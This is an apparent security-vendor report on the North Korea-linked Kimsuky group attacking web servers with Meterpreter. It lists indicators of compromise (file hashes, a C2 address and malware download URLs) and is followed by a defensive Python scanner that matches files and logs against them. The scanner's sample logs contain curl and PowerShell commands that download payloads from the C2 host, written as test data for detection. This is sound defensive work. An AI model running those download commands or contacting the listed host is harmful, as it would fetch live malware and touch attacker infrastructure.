Kimsuky Group Using Meterpreter to Attack Web Servers
AhnLab Security Emergency response Center (ASEC) has recently discovered malware being distributed to web servers by the Kimsuky group. Kimsuky is a threat group assessed to be backed by North Korea and has been active since 2013. It initially targeted North Korea-related research institutes in South Korea, then attacked a South Korean energy corporation in 2014. Since 2017, its attacks have extended to countries other than South Korea as well. [1]
ASEC has published analyses of various Kimsuky attack cases on the ASEC Blog, mainly spear-phishing attacks that delivered malicious email attachments as MS Office documents [2], OneNote files [3], or CHM files [4]. The Kimsuky group usually relies on social engineering such as the spear-phishing campaigns above, but this post covers attack cases that targeted web servers. After a successful breach, Kimsuky installed the Metasploit Meterpreter backdoor. There have also been identified logs of a proxy …
IoC
MD5
000130a373ea4085b87b97a0c7000c86
6b2062e61bcb46ce5ff19b329ce31b03
C2 address and download URLs
45.58.52.82
http://45.58.52.82/cl.exe
http://45.58.52.82/up.dat
http://45.58.52.82:8443
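The indicators above are only useful once they are checked against something. The following script is an added example, not code from ASEC or from the post: it takes the listed MD5 hashes, C2 address and URLs as data, hashes files on disk against the MD5 list, and scans log lines (web-server access logs, proxy logs, shell history) for the address and URLs. The sample log lines embedded in it are constructed for the demonstration and are not from the incident. The address is matched only as a complete dotted quad so that neighbouring addresses such as 145.58.52.82 do not produce false hits.

```python
"""Check files and log lines against the Kimsuky web-server IoCs listed above.

Added example; the IoC values come from the post, the sample log lines are
constructed for this demonstration.
"""
from __future__ import annotations

import hashlib
import re
import sys
from pathlib import Path
from typing import Iterable, List, Optional, Tuple

# IoCs as listed in the post.
IOC_MD5 = {
    "000130a373ea4085b87b97a0c7000c86",
    "6b2062e61bcb46ce5ff19b329ce31b03",
}
IOC_IP = "45.58.52.82"
IOC_URLS = (
    "http://45.58.52.82/cl.exe",
    "http://45.58.52.82/up.dat",
    "http://45.58.52.82:8443",
)

# Match the C2 address only as a whole dotted quad: a digit or dot on either
# side (e.g. "145.58.52.82" or "45.58.52.820") must not count as a hit.
_IP_RE = re.compile(r"(?<![\d.])" + re.escape(IOC_IP) + r"(?![\d.])")


def md5_hex(data: bytes) -> str:
    """Lowercase hex MD5 of an in-memory byte string."""
    return hashlib.md5(data).hexdigest()


def md5_of_path(path: Path) -> str:
    """MD5 of a file, read in 1 MiB chunks so large files are not loaded whole."""
    h = hashlib.md5()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_bad_hash(md5: str) -> bool:
    """True if the MD5 (any case, surrounding whitespace ignored) is an IoC."""
    return md5.strip().lower() in IOC_MD5


def scan_files(paths: Iterable[Path]) -> List[Path]:
    """Return every regular file whose MD5 matches one of the IoC hashes."""
    return [p for p in paths if p.is_file() and is_known_bad_hash(md5_of_path(p))]


def match_line(line: str) -> Optional[str]:
    """Return the most specific indicator found in a log line, or None.

    URLs are checked first because every URL also contains the address; a
    line that carries a full download URL is reported as that URL.
    """
    for url in IOC_URLS:
        if url in line:
            return url
    if _IP_RE.search(line):
        return IOC_IP
    return None


def scan_log_lines(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, indicator, line) for each line that hits an IoC."""
    hits = []
    for n, line in enumerate(lines, start=1):
        indicator = match_line(line)
        if indicator is not None:
            hits.append((n, indicator, line.rstrip("\n")))
    return hits


# Constructed sample lines (not from the post): an access-log line, a proxy
# CONNECT line, a shell download, a near-miss address and a PowerShell download.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2023:10:01:22 +0900] "GET /index.html HTTP/1.1" 200 512',
    "proxy: CONNECT 45.58.52.82:8443 from 10.0.0.20",
    "curl -o /tmp/cl.exe http://45.58.52.82/cl.exe",
    "outbound 145.58.52.82:443 allowed",
    "powershell -c (New-Object Net.WebClient).DownloadFile('http://45.58.52.82/up.dat','up.dat')",
]


if __name__ == "__main__":
    for n, indicator, line in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {indicator} <- {line}")
    # Optional: pass a directory to hash every file under it against IOC_MD5.
    if len(sys.argv) > 1:
        for hit in scan_files(Path(sys.argv[1]).rglob("*")):
            print(f"IoC hash match: {hit}")
```

Run it with no arguments to see the three sample hits (the proxy CONNECT line is reported as the bare address, the two downloads as their URLs, and the 145.58.52.82 line is ignored); pass a web root or upload directory as the first argument to hash its files against the two MD5s. MD5 is used only because that is the hash type the post publishes; for your own retention of samples, record SHA-256 as well.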